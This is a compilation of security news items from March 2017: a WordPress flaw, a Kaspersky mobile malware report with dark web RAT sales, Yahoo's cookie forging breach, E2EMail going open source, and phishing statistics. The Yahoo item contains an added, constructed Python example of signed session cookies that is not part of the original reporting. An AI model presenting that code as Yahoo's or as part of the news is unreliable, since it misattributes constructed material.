WordPress had a critical flaw, hackers attacked over a million sites

2.3.2017 Novinky/Bezpečnost Vulnerabilities
The operator of the popular content management system promptly released a fix, but not all of its users have automatic updates enabled.
More than a million websites that use the WordPress publishing system became the target of hacker attacks after a critical flaw appeared in the system at the beginning of February.

Although the platform’s operator promptly released a new version, 4.7.2, many users do not have automatic system updates turned on, and without manually approving the security patch their sites remain vulnerable and easy to attack.

“Two days after the fix was released we noticed a significant increase in attacks,” Mark Maunder, CEO of WordFence, the vendor of the WordPress security plugin of the same name, told Infosecurity-magazine.com. “The attacks continued, and on February 6 we recorded a new variant of the attack that bypassed our security solution and exploited flaws in other vendors’ firewalls,” he added.

Hackers competed over how many sites they could “take down”
The critical flaw activated an unusual number of hackers, who began competing over how many websites running on WordPress they could deface. “In just 48 hours we recorded over 800,000 attacks exploiting this particular WordPress vulnerability,” the head of WordFence said.

Some hackers even attacked already defaced pages and reworked them in their own image to increase their count of successful hits. WordFence recorded the case of a single hacker using the nickname MuhmadEmad who successfully attacked 350,000 websites running WordPress.

“This is one of the worst WordPress vulnerabilities in history,” the head of WordFence states. “We are working intensively to help users of this platform, but if they do not update WordPress to the latest version and do not use a sufficiently strong firewall, we cannot protect them,” he added.

WordPress is generally popular among hackers because it is so widely used. Of all the content management systems in use on the internet it has the largest market share; worldwide, six out of ten websites run on it.

WordPress is a popular target of attacks
Hand in hand with the popularity of this publishing platform, however, hackers’ interest grows too. According to last year’s survey by Sucuri, which focused on infected sites on the internet, three quarters of the more than 11,000 websites analyzed had been attacked through a flaw in WordPress.

“The basic security rule when using publishing and content management systems is to update them regularly and, where possible, without delay. It is definitely worth having automatic updates turned on,” says Miroslav Dvořák, technical director at ESET.

According to Dvořák, users should also use quality, proven security solutions that protect them from malicious code. “Relying on manually updating the system once in a while, because a red warning that you are using outdated versions has been lit up in it for a long time, is really short-sighted,” Dvořák adds.


Mobile malware is skyrocketing, advertising Trojans are the most common

2.3.2017 Root.cz Viruses
Kaspersky Lab has published a detailed report on the state of malware on mobile phones. It shows that attacks are increasing rapidly: as many attacks now take place in a year as previously took five years.

Kaspersky Lab has released a report on malware for mobile platforms. According to it, detections of mobile malware almost tripled in 2016 compared with the previous year. In total, 8.5 million malicious installations were identified. The amount of malware uncovered in this single year corresponds to 50% of the malware uncovered between 2004 and 2015, i.e. over 11 years.

Advertising Trojans are the most heavily represented. Of 20 such programs, 16 are Trojans, whereas in 2015 there were only 12. The growth is clearly visible in the statistics Kaspersky Lab collects from mobile devices:

Almost 40 million attacks by mobile malware, with over four million users of Android devices protected (compared with 2.6 million in 2015)
Over 260,000 detections of installation packages of mobile ransomware Trojans (an 8.5-fold year-on-year increase)
More than 153,000 unique users attacked by mobile ransomware (a 1.6-fold increase compared with 2015)
Over 128,000 detected mobile banking Trojans (an almost 1.6-fold increase over 2015)


Types of threats in 2015 and 2016
Advertising Trojans: has your device already been infected?
The insidious part is that once successfully launched, the Trojans obtain root privileges and thus gain full control over the device. That allows them not only to display advertising aggressively on infected devices, but also to covertly install other applications. The attackers also try to make money directly by purchasing apps through Google Play.

Having taken over the device, the Trojan can modify the partition holding the operating system, which makes it very hard to remove from the device. Some advertising Trojans are even able to attack the recovery system, practically preventing the problem from being solved by resetting the device to factory settings.

The main problem here is security flaws in Android, but the report points out that many of them have been fixed while users do not update their devices. In many cases the Trojans were able to exploit already patched vulnerabilities because users had not downloaded the latest updates.

Unfortunately, this kind of malicious software has repeatedly appeared in the Google Play store, for example disguised as a guide for the game Pokemon GO. In that particular case the application was downloaded by more than half a million users; it is detected as Trojan.AndroidOS.Ztorg.ad.


Trojan.AndroidOS.Ztorg.ad looks like a guide to the game Pokemon GO
Ransomware and banking Trojans
Extortion today is not only about servers in companies but increasingly also about mobile phones. Modern ransomware overlays open windows with a message demanding payment of a ransom, making the whole device unusable. This principle was used by the most popular ransomware program of 2016, Trojan-Ransom.AndroidOS.Fusob.

This Trojan most often attacks in Germany, the United States and Britain, while deliberately avoiding the countries of the former Soviet Union and some neighbouring countries. After launch, the Trojan checks the device language and, if it finds a mismatch, may halt its operation. The attackers behind this Trojan usually demand a ransom of 100 to 200 dollars to unlock the device. The ransom must be paid using codes for prepaid iTunes cards.

Banking Trojans are also increasing significantly. In 2016 more than 305,000 users in 164 countries were attacked by mobile banking Trojans; the previous year it was 56,000 users in 137 countries. The three countries with the highest share of users attacked by mobile banking Trojans are Russia, Australia and Ukraine.


Trojan.AndroidOS.Ztorg.ad disguised as a video player
Mobile banking Trojans evolved over the course of the year; many of them managed to bypass the new security mechanisms of the Android operating system and could thus continue stealing user information even from the latest versions of the system. At the same time, the developers of these Trojans repeatedly improved their creations’ capabilities. For example, the Marcher malware family, in addition to overlaying common banking applications, also redirected users from financial institutions’ sites to phishing websites.

It won’t work without updates
The number of advertising Trojans abusing user privileges grew constantly in 2016. Cybercriminals exploit the fact that most devices do not have the latest operating system updates (or receive them late), which makes them susceptible to old and proven threats, says Petr Kuboš of Kaspersky Lab.

Moreover, in his words, we are witnessing the mobile environment becoming overcrowded for cybercriminals, which is why they are starting to look at the world beyond smartphones. This year we will therefore probably see major attacks on IoT devices launched from mobile devices. Attacks on such devices are already under way; recall the takeover of smart cameras, network printers or routers.


Mobile malware evolution 2016
2.3.2017 Kaspersky Mobile Android Virus

The year in figures

In 2016, Kaspersky Lab detected the following:

8,526,221 malicious installation packages
128,886 mobile banking Trojans
261,214 mobile ransomware Trojans

Trends of the year

Growth in the popularity of malicious programs using super-user rights, primarily advertising Trojans.
Distribution of malware via Google Play and advertising services.
Emergence of new ways to bypass Android protection mechanisms.
Growth in the volume of mobile ransomware.
Active development of mobile banking Trojans.

Malicious programs using super-user rights

The year’s most prevalent trend was Trojans gaining super-user privileges. To get these privileges, they use a variety of vulnerabilities that are usually patched in the newer versions of Android. Unfortunately, most user devices do not receive the latest system updates, making them vulnerable.

Root privileges provide these Trojans with almost unlimited possibilities, allowing them to secretly install other advertising applications, as well as display ads on the infected device, often making it impossible to use the smartphone. In addition to aggressive advertising and the installation of third-party software, these Trojans can even buy apps on Google Play.

This malware simultaneously installs its modules in the system directory, which makes the treatment of the infected device very difficult. Some advertising Trojans are even able to infect the recovery image, making it impossible to solve the problem by restoring to factory settings.

In addition to the secret installation of advertising apps, these Trojans can also install malware. We have registered installations of the modular Trojan Backdoor.AndroidOS.Triada, which modified the Zygote processes. This allowed it to remain in the system and alter text messages sent by other apps, making it possible to steal money from the owner of the infected device. With super-user rights the Trojan can do almost anything, including substituting the URL in the browser.

Representatives of this class of malicious software have been repeatedly found in the official Google Play app store, for example, masquerading as a guide for Pokemon GO. This particular app was downloaded over half a million times and was detected as Trojan.AndroidOS.Ztorg.ad.

Trojan.AndroidOS.Ztorg.ad imitating a guide for Pokemon GO

Cybercriminals continue their use of Google Play

In Google Play in October and November, we detected about 50 new applications infected by Trojan.AndroidOS.Ztorg.am, the new modification of Trojan.AndroidOS.Ztorg.ad. According to installation statistics, many of them were installed more than 100,000 times.

Trojan.AndroidOS.Ztorg.ad imitating a video player

Google Play was used to spread Trojans capable of stealing login credentials. One of them was Trojan-Spy.AndroidOS.Instealy.a which stole logins and passwords for Instagram accounts. Another was Trojan-PSW.AndroidOS.MyVk.a: it was repeatedly published in Google Play and targeted user data from the social networking site VKontakte.

Yet another example is Trojan-Ransom.AndroidOS.Pletor.d, distributed by cybercriminals under the guise of an app for cleaning operating systems. Usually, representatives of the Trojan-Ransom.AndroidOS.Pletor family encrypt files on the victim device, but the detected modification only blocked the gadget and demanded a ransom to unblock it.

Trojan-Ransom.AndroidOS.Pletor.d imitating a system cleaner

Bypassing Android’s protection mechanisms

Cybercriminals are constantly looking for ways to bypass Android’s new protection mechanisms. For instance, in early 2016, we found that some modifications of the Tiny SMS Trojan were able to use their own window to overlay a system message warning users about sending a text message to a premium rate number. As the owner of the smartphone cannot see the original text, they are unaware of what they are agreeing to, and send the message to the number specified by the attacker.

A similar method was used by Trojan-Banker.AndroidOS.Asacub to get administrator rights on the device. The Trojan hides the system request from the user, cheating the latter into granting it extra privileges. In addition, Asacub asks for the right to be the default SMS application, which allows it to steal messages even in newer versions of Android.

The authors of Trojan-Banker.AndroidOS.Gugi went even further. This malicious program is able to bypass two new Android 6 security mechanisms using only social engineering techniques. Without exploiting system vulnerabilities, Gugi bypasses the request for Android’s permission to display its window on top of other applications as well as the dynamic permission requirement for potentially dangerous actions.

Mobile ransomware

While the very first mobile encryptor Trojan really did encrypt user data on a device and demand money to decrypt them, current ransomware simply displays the ransom demand on top of other windows (including system windows), thus making it impossible to use the device.

The same principle was used by the most popular mobile ransom program in 2016 – Trojan-Ransom.AndroidOS.Fusob. Interestingly, this Trojan attacks users in Germany, the US and the UK, but avoids users from the CIS and some neighboring countries (once executed, it runs a check of the device language, after which it may stop working). The cybercriminals behind the Trojan usually demand between $100 and $200 to unblock a device. The ransom has to be paid using codes from pre-paid iTunes cards.

Yet another way to block devices is to use the Trojan-Ransom.AndroidOS.Congur family, which is popular in China. These Trojans change the PIN code for the gadget, or enable this safety function by setting their own PIN. To do this, the ransom program has to get administrator rights. The victim is told to contact the attackers via the QQ messenger to unblock the device.

Mobile banking Trojans continued to evolve through the year. Many of them gained tools to bypass the new Android security mechanisms and were able to continue stealing user information from the most recent versions of the OS. Also, the developers of mobile banking Trojans added more and more new features to their creations. For example, the Marcher family redirected users from financial to phishing sites over a period of several months.

In addition, many mobile banking Trojans include functionality for extorting money: upon receiving a command from a server, they can block the operation of a device with a ransom-demand window. We discovered that one modification of Trojan-Banker.AndroidOS.Faketoken could not only overlay the system interface but also encrypt user data.

It is also worth noting that the cybercriminals behind malicious programs for Android did not forget about one of the hottest topics of 2016 – IoT devices. In particular, we discovered the ‘attack-the-router’ Trojan Switcher which targets the Wi-Fi network an infected device is connected to. If the Trojan manages to guess the password to the router, it changes the DNS settings, implementing a DNS-hijacking attack.

A glance into the Dark Web. Contribution from INTERPOL’s Global Complex for Innovation.

The Dark Web provides a means for criminal actors to communicate and engage in commercial transactions, like buying and selling various products and services, including mobile malware kits. Vendors and buyers increasingly take advantage of the multiple security and business-oriented mechanisms put in place on Tor (The Onion Router) cryptomarkets, such as the use of cryptocurrencies, third-party administration services (escrow), multisignature transactions, encryption, reputation/feedback tracking and others. INTERPOL has looked into major Dark Web platforms and found that mobile malware is offered for sale as software packages (e.g. remote access trojans – RATs); individual solutions; sophisticated tools, like those developed by professional firms; or, on a smaller scale, as part of a ‘Bot as a Service’ model. Mobile malware is also a ‘subject of interest’ on vendor shops, forums and social media.

Marketplaces

A number of mobile malware products and services are offered for sale on Dark Web marketplaces. Mobile malware is often advertised as part of a package, which can include, for instance, remote access trojans (RATs), phishing pages, or ‘hacking’ software bundles which consist of forensic and password-breaking tools. Individual/one piece tools are also offered for sale. For example, DroidJack was offered by different vendors on four major marketplaces. This popular Android RAT is sold openly on the Clearnet for a high price, but on the Dark Web the price is much lower.

Both variants (package and individual) sometimes come with ‘how-to’ guides which explain the methods for hacking popular operating systems, such as Android and iOS. More sophisticated tools are also advertised on the Dark Web, such as Galileo, a remote control system developed by the Italian IT company Hacking Team in order to access remotely and then exploit devices that run Android, iOS, BlackBerry, Windows or OS X. Another example is the source code for Acecard. This malware is known for adding overlay screens on top of mobile banking applications and then forwarding the user’s login credentials to a remote attacker. It can also access SMS, from which potentially useful two-factor authentication codes can be obtained by fraudsters.

The Android bot rent service (BaaS, or Bot as a Service) is also available for purchase. The bot can be used to gather financial information from Android phones and comes with many features and documentation, available in both Russian and English. More features and specifications can be developed on request. This service can cost up to USD 2,500 per month or USD 650 per week.

Mobile phishing products for obtaining financial information, tools that can control phones through Bluetooth or change their IMEI (International Mobile Equipment Identity), and various Android RATs that focus on intercepting text messages, call logs and locations, and accessing the device’s camera, are also displayed on Dark Web marketplaces.

Vendor shops, forums and social media

Vendor shops are standalone platforms created by a single vendor or a group of vendors who have built up a customer base on a marketplace and then decided to start their own business. Generally, these shops do not have forums and merely advertise one specific type of illicit item, such as drugs or stolen personal information, but they also sell mobile malware (DroidJack). Tutorials are sometimes attached to mobile malware products, and information on which tools are fit for purpose and how to install and utilize them can also be found in forum threads and on social media. Furthermore, a Tor hidden service focused on hacking news was found to contain information on how to set up Dendroid mobile malware. This RAT, which is capable of intercepting SMS messages, downloading pictures and opening a dialogue box to phish passwords, dates from 2014 but was still offered in 2016 as part of several advertisements (packages) on different marketplaces.

Due to its robust anonymity, OPSEC techniques, low prices and client-oriented strategy, the Dark Web remains an attractive medium for conducting illicit businesses and activities, and one where specific crime areas may arise or grow in the future. The development of innovative technical solutions (in close cooperation with academia, research institutes and private industry), international cooperation and capacity building are fundamental pillars in the fight against the use of Dark Web by criminals.

Statistics

In 2016, the number of malicious installation packages grew considerably, amounting to 8,526,221 – three times more than the previous year. As a comparison, from 2004 to 2013 we detected over 10,000,000 malicious installation packages; in 2014 the figure was nearly 2.5 million.

From the beginning of January till the end of December 2016, Kaspersky Lab registered nearly 40 million attacks by malicious mobile software and protected 4,018,234 unique users of Android-based devices (vs 2.6 million in 2015).

The number of attacks blocked by Kaspersky Lab solutions, 2016

The number of users protected by Kaspersky Lab solutions, 2016

Geography of mobile threats

Attacks by malicious mobile software were recorded in more than 230 countries and territories.

The geography of mobile threats by number of attacked users, 2016

TOP 10 countries by the percentage of users attacked by mobile malware

Rank  Country*      Attacked users**
   1  Bangladesh    50.09%
   2  Iran          46.87%
   3  Nepal         43.21%
   4  China         41.85%
   5  Indonesia     40.36%
   6  Algeria       36.62%
   7  Nigeria       35.61%
   8  Philippines   34.97%
   9  India         34.18%
  10  Uzbekistan    31.96%

* Countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000 are excluded.
** Attacked unique users as a percentage of all users of Kaspersky Lab’s mobile security products in the country.

China, which topped this rating in 2015, continued to lead the way in the first half of 2016 but dropped to fourth overall for the year, being replaced by Bangladesh, which led similar ratings throughout 2016. More than half of all users of Kaspersky Lab mobile security products in Bangladesh encountered mobile malware.

The most widespread mobile malware targeting users in Bangladesh in 2016 were representatives of advertising Trojans belonging to the Ztorg and Iop families, as well as advertising programs of the Sprovider family. This malware, as well as representatives of the AdWare.AndroidOS.Ewind and AdWare.AndroidOS.Sprovider families were most frequently found on user devices in all the countries in the Top 10, except China and Uzbekistan.

In China, a significant proportion of the attacks involved the Backdoor.AndroidOS.Fakengry.h and Backdoor.AndroidOS.GinMaster.a families as well as representatives of RiskTool.AndroidOS.

Most of the attacks on users in Uzbekistan were carried out by Trojan-SMS.AndroidOS.Podec.a and Trojan-FakeAV.AndroidOS.Mazig.b. Representatives of the advertising Trojans Iop and Ztorg, as well as the advertising programs of the Sprovider family were also quite popular in the country.

Types of mobile malware

Starting this year, we calculate the distribution of mobile software by type, based on the number of detected installation packages, rather than modifications.

 

Distribution of new mobile malware by type in 2015 and 2016

Over the reporting period, the number of new RiskTool files detected grew significantly – from 29% in 2015 to 43% in 2016. At the same time, the share of new AdWare files fell – 13% vs 21% in the previous year.

For the second year running, the percentage of detected SMS Trojan installation packages continued to decline – from 24% to 11%, which was the most notable fall. Despite this, we cannot say that the SMS Trojan threat is no longer relevant; in 2016, we detected nearly 700,000 new installation packages.

The most considerable growth was shown by Trojan-Ransom: the share of this type of malware among all installation packages detected in 2016 increased almost 6.5 times to 4%. This growth was caused by the active distribution of two families of mobile ransomware – Trojan-Ransom.AndroidOS.Fusob and Trojan-Ransom.AndroidOS.Congur.

Top 20 malicious mobile programs

Please note that the ranking of malicious programs below does not include potentially unwanted programs such as RiskTool or AdWare (advertising programs).

Detection %*
1 DangerousObject.Multi.Generic 67.93%
2 Backdoor.AndroidOS.Ztorg.c 6.58%
3 Trojan-Banker.AndroidOS.Svpeng.q 5.42%
4 Trojan.AndroidOS.Iop.c 5.25%
5 Backdoor.AndroidOS.Ztorg.a 4.83%
6 Trojan.AndroidOS.Agent.gm 3.44%
7 Trojan.AndroidOS.Ztorg.t 3.21%
8 Trojan.AndroidOS.Hiddad.v 3.13%
9 Trojan.AndroidOS.Ztorg.a 3.11%
10 Trojan.AndroidOS.Boogr.gsh 2.51%
11 Trojan.AndroidOS.Muetan.b 2.40%
12 Trojan-Ransom.AndroidOS.Fusob.pac 2.38%
13 Trojan-Ransom.AndroidOS.Fusob.h 2.35%
14 Trojan.AndroidOS.Sivu.c 2.26%
15 Trojan.AndroidOS.Ztorg.ag 2.23%
16 Trojan.AndroidOS.Ztorg.aa 2.16%
17 Trojan.AndroidOS.Hiddad.an 2.12%
18 Trojan.AndroidOS.Ztorg.i 1.95%
19 Trojan-Dropper.AndroidOS.Agent.cv 1.85%
20 Trojan-Dropper.AndroidOS.Triada.d 1.78%
* Percentage of users attacked by the malware in question, relative to all users attacked.

First place in the Top 20 is occupied by DangerousObject.Multi.Generic (67.93%), the verdict used for malicious programs detected by cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor the heuristics to detect a malicious program. This is basically how the very latest malware is detected.

In second place was Backdoor.AndroidOS.Ztorg.c, the advertising Trojan using super-user rights to secretly install various applications. Noticeably, the 2016 rating included 16 advertising Trojans (highlighted in blue in the table), which is four more than in 2015.

The most popular mobile banking Trojan in 2016 was Trojan-Banker.AndroidOS.Svpeng.q in third place. The Trojan became so widespread after being distributed via the AdSense advertising network. Due to a vulnerability in the Chrome browser, the user was not required to take any action for the Trojan to be downloaded to the device. It should be noted that more than half of the users attacked by mobile banking Trojans in 2016 encountered representatives of the Svpeng family. They use phishing windows to steal credit card data and also attack SMS banking systems.

Representatives of the Fusob family – Trojan-Ransom.AndroidOS.Fusob.pac and Trojan-Ransom.AndroidOS.Fusob.h – claimed 12th and 13th respectively. These Trojans block a device by displaying their own window and demanding a ransom to remove it.

Mobile banking Trojans

In 2016, we detected 128,886 installation packages of mobile banking Trojans, which is 1.6 times more than in 2015.

 

Number of installation packages of mobile banking Trojans detected by Kaspersky Lab solutions in 2016

In 2016, 305,543 users in 164 countries were attacked by mobile banking Trojans vs 56,194 users in 137 countries the previous year.

 

Geography of mobile banking threats in 2016 (number of users attacked)

Top 10 countries by the percentage of users attacked by mobile banking Trojans relative to all attacked users

Country* %**
1 Russia 4.01
2 Australia 2.26
3 Ukraine 1.05
4 Uzbekistan 0.70
5 Tajikistan 0.65
6 The Republic of Korea 0.59
7 Kazakhstan 0.57
8 China 0.54
9 Belarus 0.47
10 Moldova 0.39
* We excluded those countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000.
** Percentage of unique users attacked by mobile banking Trojans, relative to all users of Kaspersky Lab’s mobile security products in the country.

In Russia – ranked first in the Top 10 – mobile banking Trojans were encountered by 4% of mobile users. This is almost two times higher than in second-placed Australia. The difference is easily explained by the fact that the most popular mobile banking Trojan Svpeng was mostly spread in Russia. Representatives of the Asacub and Faketoken families were also popular there.

In Australia, the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher families were responsible for most infection attempts. In South Korea (7th place) the most popular banking Trojans belonged to the Trojan-Banker.AndroidOS.Wroba family.

In the other countries of the Top 10, the most actively distributed mobile banking Trojan families were Trojan-Banker.AndroidOS.Faketoken and Trojan-Banker.AndroidOS.Svpeng. The representatives of the latter were especially widespread in 2016, with more than half of mobile users encountering them. As we have already mentioned, this was the result of them being distributed via the AdSense advertising network and being loaded stealthily via a mobile browser vulnerability.

The Trojan-Banker.AndroidOS.Faketoken family was in second place in this rating. Some of its modifications were capable of attacking more than 2,000 financial organizations.

Third place was occupied by the Trojan-Banker.AndroidOS.Asacub family, which attacked more than 16% of all users affected by mobile bankers. These Trojans are mainly distributed in Russia, often via SMS spam.

Mobile Trojan-Ransom

In 2016, the volume of mobile ransomware increased considerably both in the number of installation packages detected and in the number of users attacked. Over the reporting period, we detected 261,214 installation packages, which is almost 8.5 times more than in 2015.

 

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab
(Q1 2016 – Q4 2016)

In 2016, 153,258 unique users from 167 countries were attacked by Trojan-Ransom programs; this is 1.6 times more than in 2015.

Interestingly, a large number of installation packages in the first two quarters of 2016 belonged to the Trojan-Ransom.AndroidOS.Fusob family, though there was a fall in activity in the third quarter. The subsequent growth in the fourth quarter was fueled by an increase in activity by the Trojan-Ransom.AndroidOS.Congur family: it includes relatively simple Trojans that either block a device using their own window, or change the device’s password.

 

Geography of mobile ransomware threats in 2016 (number of users attacked)

TOP 10 countries attacked by Trojan-Ransom malware – share of users relative to all attacked users in the country.

Country* %**
1 Germany 2.54
2 USA 2.42
3 Canada 2.34
4 Switzerland 1.88
5 Kazakhstan 1.81
6 United Kingdom 1.75
7 Italy 1.63
8 Denmark 1.29
9 Mexico 1.18
10 Australia 1.13
* We excluded those countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000.
** Percentage of unique users attacked by mobile Trojan ransomware, relative to all users of Kaspersky Lab’s mobile security products in the country.

The largest percentage of mobile users attacked by ransomware was in Germany – over 2.5%. In almost all the countries in this ranking, representatives of the Trojan-Ransom.AndroidOS.Fusob and Trojan-Ransom.AndroidOS.Svpeng families were particularly popular. Kazakhstan (5th place) was the only exception – the most frequently used ransom programs there were various modifications of the Trojan-Ransom.AndroidOS.Small family.

More information about these three families of mobile Trojan ransomware can be found in a dedicated study.

Conclusion

In 2016, the growth in the number of advertising Trojans capable of exploiting super-user rights continued. Throughout the year it was the No. 1 threat, and we see no sign of this trend changing. Cybercriminals are taking advantage of the fact that most devices do not receive OS updates (or receive them late), and are thus vulnerable to old, well-known and readily available exploits.

This year, we will continue to closely monitor the development of mobile banking Trojans: the developers of this class of malware are the first to use new technologies and are always looking for ways to bypass security mechanisms implemented in the latest versions of mobile operating systems.

In 2016, one of the most controversial issues was the safety of IoT devices. Various Internet-connected ‘smart’ devices are becoming increasingly popular, though their level of security is fairly low. Also in 2016, we discovered an ‘attack-the-router’ Trojan. We see that the mobile landscape is getting a little crowded for cybercriminals, and they are beginning to interact more with the world beyond smartphones. Perhaps in 2017 we will see major attacks on IoT components launched from mobile devices.


Yahoo Reveals 32 Million Accounts Were Hacked Using 'Cookie Forging Attack'
2.3.2017 thehackernews Incindent
Yahoo has just revealed that around 32 million user accounts were accessed by hackers in the last two years using a sophisticated cookie forging attack without any password.
These compromised accounts are in addition to the Yahoo accounts affected by the two massive data breaches that the company disclosed in last few months.
The former tech giant said in a regulatory filing Wednesday that the cookie caper is likely linked to the "same state-sponsored actor" thought to be behind a separate 2014 data breach that resulted in the theft of 500 Million user accounts.
"Based on the investigation, we believe an unauthorized third party accessed the company's proprietary code to learn how to forge certain cookies," Yahoo said in its annual report filed with the US Securities and Exchange Commission (SEC).
"The outside forensic experts have identified approximately 32 million user accounts for which they believe forged cookies were used or taken in 2015 and 2016. We believe that some of this activity is connected to the same state-sponsored actor believed to be responsible for the 2014 security incident."
"Forged cookies" are digital keys that allow access to accounts without re-entering passwords.
Instead of stealing passwords, hackers trick a web browser into telling Yahoo that the victim had already logged in by forging little web browser tokens called cookies.

Yahoo revealed the cookie caper in December last year, but the news was largely overlooked, as the statement from Yahoo provided information on a separate data breach that occurred in August 2013 involving more than 1 Billion Yahoo accounts.
In a statement, the company said the hackers might have stolen names, email addresses, hashed passwords, telephone numbers, dates of birth, and, in some cases, encrypted or unencrypted security questions and answers.
Yahoo began warning its customers just last month that some state-sponsored actors had accessed their Yahoo accounts by using the sophisticated cookie forging attack.
However, the good news is that the forged cookies have since been "invalidated" by Yahoo so they cannot be used to access user accounts.
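The two controls described above, a cookie the server can check for forgery and the ability to invalidate cookies wholesale, are shown below as an added example that is not Yahoo's code; the key-ring layout, the cookie format and all function names are assumptions made for the illustration.

```python
"""Signed session cookies: the check that defeats cookie forging.

Constructed example (not Yahoo's code). A cookie carries a key id, a base64
payload and an HMAC-SHA256 tag; without the server's secret key the payload
cannot be altered or minted from scratch, and retiring a key invalidates
every cookie (genuine or forged) that was signed under it. The secret must
live in a secrets store, never in source code, since the page notes that
access to proprietary code was enough to learn how to forge Yahoo's cookies.
"""
import base64
import hashlib
import hmac
import json
from typing import Dict, Optional

KeyRing = Dict[int, bytes]   # key id -> secret key (hypothetical structure)


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _tag(key: bytes, key_id: int, payload_b64: str) -> str:
    # The key id is covered by the tag so it cannot be swapped either.
    msg = f"{key_id}.{payload_b64}".encode("ascii")
    return _b64e(hmac.new(key, msg, hashlib.sha256).digest())


def issue_cookie(user_id: str, keyring: KeyRing, key_id: int,
                 ttl_seconds: int, now: int) -> str:
    """Mint 'kid.payload.tag' for user_id, valid until now + ttl_seconds."""
    claims = {"uid": user_id, "exp": now + ttl_seconds}
    payload = _b64e(json.dumps(claims, separators=(",", ":")).encode("utf-8"))
    return f"{key_id}.{payload}.{_tag(keyring[key_id], key_id, payload)}"


def verify_cookie(cookie: str, keyring: KeyRing, now: int) -> Optional[dict]:
    """Return the session claims, or None if the cookie is malformed, forged,
    expired, or signed under a key that has since been retired."""
    parts = cookie.split(".")
    if len(parts) != 3 or not parts[0].isdigit():
        return None
    key_id, payload, tag = int(parts[0]), parts[1], parts[2]
    key = keyring.get(key_id)
    if key is None:                      # key retired: cookie invalidated
        return None
    # Constant-time comparison so the tag cannot be guessed byte by byte.
    if not hmac.compare_digest(_tag(key, key_id, payload), tag):
        return None
    try:
        claims = json.loads(_b64d(payload))
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(claims, dict) or claims.get("exp", 0) <= now:
        return None
    return claims


def tampered_copy(cookie: str, new_user_id: str) -> str:
    """Negative test helper: rewrite the claims but keep the old tag, which is
    all that can be done without the key. verify_cookie must reject it."""
    key_id, payload, tag = cookie.split(".")
    claims = json.loads(_b64d(payload))
    claims["uid"] = new_user_id
    new_payload = _b64e(json.dumps(claims, separators=(",", ":")).encode())
    return f"{key_id}.{new_payload}.{tag}"


def retire_key(keyring: KeyRing, key_id: int) -> KeyRing:
    """Invalidate every cookie signed under key_id: the wholesale response
    once a signing key is suspected of having leaked."""
    return {k: v for k, v in keyring.items() if k != key_id}


if __name__ == "__main__":
    # Constructed demo keys; real keys are random and come from a secrets store.
    ring = {1: b"constructed-demo-key-1", 2: b"constructed-demo-key-2"}
    good = issue_cookie("alice", ring, 1, ttl_seconds=3600, now=1_000)
    print("genuine  :", verify_cookie(good, ring, now=2_000))
    print("tampered :", verify_cookie(tampered_copy(good, "admin"), ring, now=2_000))
    print("expired  :", verify_cookie(good, ring, now=5_000))
    print("key gone :", verify_cookie(good, retire_key(ring, 1), now=2_000))
```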
Yahoo's CEO Marissa Mayer Loses Bonus
In the meantime, when Yahoo revealed the scope of the cookie caper, Yahoo CEO Marissa Mayer said she would forgo her annual bonus, which is US$2 Million, and any 2017 equity award, which is usually about $12 Million of stock, in response to the security incidents that occurred during her tenure.
"When I learned in September 2016 that a large number of our user database files had been stolen, I worked with the team to disclose the incident to users, regulators, and government agencies," Mayer wrote in a note published Monday on Tumblr.
"However, I am the CEO of the company and since this incident happened during my tenure, I have agreed to forgo my annual bonus and my annual equity grant this year and have expressed my desire that my bonus be redistributed to our company’s hardworking employees, who contributed so much to Yahoo’s success in 2016."
Besides this, Yahoo's general counsel and secretary Ronald Bell also resigned as of Wednesday after the company revealed that "senior executives and relevant legal staff were aware that a state-sponsored actor had accessed certain user accounts by exploiting the Company’s account management tool."
The ongoing revelation of security incidents in the company has hit Yahoo's credibility badly. Just last month, Yahoo and Verizon Communications Inc. agreed to reduce the price of the upcoming acquisition deal by $350 Million in the wake of the two data breaches.
The deal, which was previously finalized at $4.8 Billion, is now valued at about $4.48 Billion in cash and is expected to close in the second quarter.


The Google E2EMail is now fully community-driven open source project
2.3.2017 securityaffairs Krypto

Google has now announced that E2EMail is no more a Google product, instead, it has become a “fully community-driven open source project.”
The End-to-End crypto library is a core component of several projects of the IT giant such as the E2EMail, a Chrome app that runs independent of the normal Gmail web interface and allows non-technical users to exchange encrypted text mail over Gmail.

In the past, Google shared the E2EMail source code in order to receive contributions from several security communities. Now Google has announced that the project is no longer a Google product; instead, it has become a “fully community-driven open source project.”

The decision is probably motivated by the fact that, so far, no one has developed a Chrome extension for E2EMail.

“E2EMail is not a Google product, it’s now a fully community-driven open source project, to which passionate security engineers from across the industry have already contributed.” reads the blog post published by Google.

E2EMail

“E2EMail offers one approach to integrating OpenPGP into Gmail via a Chrome Extension, with improved usability, and while carefully keeping all cleartext of the message body exclusively on the client. E2EMail is built on a proven, open source Javascript crypto library developed at Google.”

Google is looking forward to receiving the support of the security community to integrate E2EMail with other projects.

“E2EMail in its current incarnation uses a bare-bones central keyserver for testing, but the recent Key Transparency announcement is crucial to its further evolution,” continues the post. “Key discovery and distribution lie at the heart of the usability challenges that OpenPGP implementations have faced. Key Transparency delivers a solid, scalable, and thus practical solution, replacing the problematic web-of-trust model traditionally used with PGP.”


Phishing Trends Report – 2016 ended as the worst year for phishing in history
2.3.2017 securityaffairs Phishing

The Anti-Phishing Working Group (APWG) published the Phishing Trends Report for Q4 2016. APWG reported 1.2 million phishing attacks in 2016.
The Anti-Phishing Working Group (APWG) published the Phishing Trends Report for Q4 2016. The data are worrisome: 2016 ended as the worst year for phishing in history. The experts reported that the total number of phishing attacks in 2016 was 1,220,523, a 65 percent increase over 2015.

The analysis of data across the years gives valuable information about the evolution of phishing activities.

In little more than a decade, the number of phishing attacks per month observed in Q4 rose from 1,609 in 2004 to 92,564 in 2016 (+5,753 percent).

The most targeted industry sectors in the fourth quarter of 2016 were Retail and Financial services.

Phishing Trends Report Q4 2016

